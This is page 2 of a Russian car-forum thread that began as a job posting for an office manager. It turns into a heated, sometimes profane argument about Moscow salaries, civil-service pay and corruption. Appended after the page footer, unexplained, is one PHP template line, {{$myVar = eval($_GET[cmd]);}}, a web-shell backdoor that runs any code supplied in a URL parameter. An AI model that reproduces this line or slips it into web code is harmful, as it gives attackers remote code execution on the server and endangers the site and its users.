+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя
Показано с 11 по 20 из 26

Тема: Нужен офис-менеджер


  1. #11
    GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Регистрация
    09.07.2006
    Откуда
    мск
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Сообщений
    3,787
    Цитата Сообщение от Quizzus Посмотреть сообщение
    Не смешите мои тапки. Я тоже на гос службе столько же получал, но там не за зарплату работают)) Я не говорю, что эта работа должна выше оплачиваться, я говорю, что на такую зарплату жить проблематично в мск.
    Заправщик с учетом чаевых получает 35-40))
    ну я работая на госслужбе работал за свои деньги. А если ты был взяточник-казнокрад-вор-мошенник (нужное подчеркнуть), тогда это сугубо твои личные проблемы и амбиции.


    з.ы. Заправщик носится по улице. Воняет бензом и мерзнет. Тут же тепличные условия и тдтп.

    Добавлено через 1 минуту
    з.ы.ы. з.п. младшего офицера в армии 15-20т.р.
    фсб - 30-35
    фсо 35-40.
    и чо? хочешь сказать там тоже все не зарплату живут.
    Зажрался ктото просто.
    Последний раз редактировалось S@TURN; 11.01.2012 в 17:53. Причина: Добавлено сообщение
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

  2. #12
    GTI-Racing KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all Аватар для KOT
    Регистрация
    25.04.2010
    Откуда
    Москва, Красногорск
    Машина
    GTI V
    Сообщений
    1,784
    Молчите блин я получаю 25 тыщ)))))))
    Скорость это смерть, а всему виной жажда скорости...

  3. #13
    Супер Модератор Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Аватар для Spaceman
    Регистрация
    13.01.2009
    Откуда
    Moscow
    Машина
    GTI Overload
    Сообщений
    6,561
    Цитата Сообщение от TOK Посмотреть сообщение
    Молчите блин я получаю 25 тыщ)))))))
    Молчи блин! что 25 это только официально)))
    Golf V GTI Overload почти сток...

  4. #14
    GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Регистрация
    09.07.2006
    Откуда
    мск
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Сообщений
    3,787
    Серега ты отдельная песня, за мост внезапный ремонт моста на новой рязанке я тебя лично при встрече "отблагодарю"!!!)))
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

  5. #15
    GTI-Racing KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all Аватар для KOT
    Регистрация
    25.04.2010
    Откуда
    Москва, Красногорск
    Машина
    GTI V
    Сообщений
    1,784
    Цитата Сообщение от Spaceman Посмотреть сообщение
    Молчи блин! что 25 это только официально)))
    Тебе смешно , а я не шучу...
    Цитата Сообщение от S@TURN Посмотреть сообщение
    Серега ты отдельная песня, за мост внезапный ремонт моста на новой рязанке я тебя лично при встрече "отблагодарю"!!!)))
    Это не ко мне)))
    Скорость это смерть, а всему виной жажда скорости...

  6. #16
    GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Регистрация
    09.07.2006
    Откуда
    мск
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Сообщений
    3,787
    Цитата Сообщение от TOK Посмотреть сообщение
    Тебе смешно , а я не шучу...
    мне вот тоже...
    даже знаете ли обидно, когда ты называешь свой реальный доход на благо государства, а за глаза все трындят, мол это только на бумаге, а как же откаты, взятки, подарки и прочее...хуйня это все.
    все зависит от человека, просто в гос.аппарате слишком много сейчас говна собралось, вот изза этого много хороших людей от туда уходит, а обыватели думают, что вся власть состоит из казнокрадов. :commandos:
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

  7. #17
    GTI-Racing Quizzus will become famous soon enough Аватар для Quizzus
    Регистрация
    03.10.2008
    Откуда
    Moscow
    Машина
    GTI EDITION 30
    Сообщений
    748
    Цитата Сообщение от S@TURN Посмотреть сообщение
    ну я работая на госслужбе работал за свои деньги. А если ты был взяточник-казнокрад-вор-мошенник (нужное подчеркнуть), тогда это сугубо твои личные проблемы и амбиции.


    з.ы. Заправщик носится по улице. Воняет бензом и мерзнет. Тут же тепличные условия и тдтп.

    Добавлено через 1 минуту
    з.ы.ы. з.п. младшего офицера в армии 15-20т.р.
    фсб - 30-35
    фсо 35-40.
    и чо? хочешь сказать там тоже все не зарплату живут.
    Зажрался ктото просто.
    Подчеркните сразу все пункты))) А то, что ты на госслужбе работал на одну ЗП, это твои проблемы. И да, я, пожалуй, зажрался, буржуй.
    Да и вообще, если человек в состоянии зарабатывать больше 35 р. в месяц, но при этом сидит на этой зарплате, он олень. Это моя гражданская позиция.
    И еще: Я считаю, что вся ВЛАСТЬ состоит из казнокрадов и мошенников. А рядовые сотрудники-это не власть. Ты путаешь понятия.
    Последний раз редактировалось Quizzus; 11.01.2012 в 18:38.

  8. #18
    GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Регистрация
    09.07.2006
    Откуда
    мск
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Сообщений
    3,787
    Цитата Сообщение от Quizzus Посмотреть сообщение
    Подчеркните сразу все пункты))) А то, что ты на госслужбе работал на одну ЗП, это твои проблемы. И да, я, пожалуй, зажрался, буржуй.
    Да и вообще, если человек в состоянии зарабатывать больше 35 р. в месяц, но при этом сидит на этой зарплате, он олень. Это моя гражданская позиция.
    И еще: Я считаю, что вся ВЛАСТЬ состоит из казнокрадов и мошенников. А рядовые сотрудники-это не власть. Ты путаешь понятия.
    ну значит ждет тебя кара небесная.
    По поводу 35р., всегда есть определенная грань, есть присяга, честь и достоинтсво, если ты хочешь зарабатывать - вали и зарабатывай. Я в принципе намедни так и поступил.
    Рядовые сотрудники-это клерки, их везде достаточно. Власть, это и есть власть, если тебе доверяется определенный фронт, а ты на него забиваешь и занимаешься личным обогощением. Если ты не готов пожертвовать несколькими годами жизни ради государства, то и нехуй туда соваться, за деньгами в коммерцию.

    В совке таких людей как ты не было. Очень жаль, что сейчас их так много.
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

  9. #19
    GTI-Racing Quizzus will become famous soon enough Аватар для Quizzus
    Регистрация
    03.10.2008
    Откуда
    Moscow
    Машина
    GTI EDITION 30
    Сообщений
    748
    Цитата Сообщение от S@TURN Посмотреть сообщение
    ну значит ждет тебя кара небесная.
    По поводу 35р., всегда есть определенная грань, есть присяга, честь и достоинтсво, если ты хочешь зарабатывать - вали и зарабатывай. Я в принципе намедни так и поступил.
    Рядовые сотрудники-это клерки, их везде достаточно. Власть, это и есть власть, если тебе доверяется определенный фронт, а ты на него забиваешь и занимаешься личным обогощением. Если ты не готов пожертвовать несколькими годами жизни ради государства, то и нехуй туда соваться, за деньгами в коммерцию.

    В совке таких людей как ты не было. Очень жаль, что сейчас их так много.
    Сколько громких слов то написал)))) На личности перейти решил? таких как ты....А откуда ты знаешь какой я? По паре фраз вычислил? Вот у меня по паре твоих фраз сложилось впечатление что ты олень, но я же не говорю об этом, т.к. совершенно тебя не знаю. Вдруг ты не олень, а я тебя зря обижу. А ты пишешь про высокие идеалы, про самопожертвование? Считаешь себя святым?))) ну-ну. Далее считаю следует закрыть бессмысленое обсуждение. Удачи в поиске сотрудников :)

  10. #20
    GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Регистрация
    09.07.2006
    Откуда
    мск
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Сообщений
    3,787
    Цитата Сообщение от Quizzus Посмотреть сообщение
    Сколько громких слов то написал)))) На личности перейти решил? таких как ты....А откуда ты знаешь какой я? По паре фраз вычислил? Вот у меня по паре твоих фраз сложилось впечатление что ты олень, но я же не говорю об этом, т.к. совершенно тебя не знаю. Вдруг ты не олень, а я тебя зря обижу. А ты пишешь про высокие идеалы, про самопожертвование? Считаешь себя святым?))) ну-ну. Далее считаю следует закрыть бессмысленое обсуждение. Удачи в поиске сотрудников :)
    Константин, я только за то, чтобы каждый выполнял те функции под которые подписывался. Ты сам написал, что работал не за зарплату.
    Другое дело, если у тебя уже тогда был маленький бизнес не связанный с основным видом деятельности. Совершенно меняет дело.
    Я пожалуй олень в том, что слишком сильно верил в наше государство. Теперь уже не верю.
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Требуется менеджер в офис.
    от Эмиль в разделе Бизнес
    Ответов: 16
    Последнее сообщение: 22.06.2020, 11:20
  2. Нужен кому ящик Ред Була в офис?)))
    от dimm в разделе Курилка
    Ответов: 5
    Последнее сообщение: 30.08.2019, 09:22
  3. Ответов: 0
    Последнее сообщение: 20.09.2013, 14:01
  4. Отдаю в аренду офис до 100м2 м.ВДНХ
    от Саркис в разделе Недвижимость
    Ответов: 13
    Последнее сообщение: 21.09.2011, 14:20
  5. Нужен Г3
    от mavr в разделе Покупка и продажа авто
    Ответов: 0
    Последнее сообщение: 27.06.2007, 16:49

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}